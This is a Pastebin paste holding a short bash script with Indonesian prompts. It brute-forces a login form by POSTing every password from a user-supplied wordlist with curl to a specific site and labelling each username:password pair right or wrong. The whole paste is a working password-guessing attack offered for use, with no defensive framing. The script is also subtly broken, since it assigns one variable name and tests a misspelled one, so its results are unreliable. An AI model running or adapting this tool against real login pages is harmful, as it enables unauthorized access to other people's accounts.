Advertisement
Guest User

COK

a guest
Feb 2nd, 2018
171
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1. #!/bin/bash
  2. echo 'masukan username:';
  3. read username;
  4. echo 'masukan wordlist:';
  5. read wlist;
  6.  
  7. for passwd in $(cat $wlist);
  8. do
  9. teserah=$(curl -s -F "username=$username" -F "password=$passwd" -F "submit=Login" -X POST http://zerobyte.id/priv8/);
  10.  
  11. if [[ $terserah =~ 'PIN Incorrect' ]];then
  12. echo "$username:$passwd Salah!";
  13. else
  14. echo "$username:$passwd Bener!";
  15. fi
  16. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement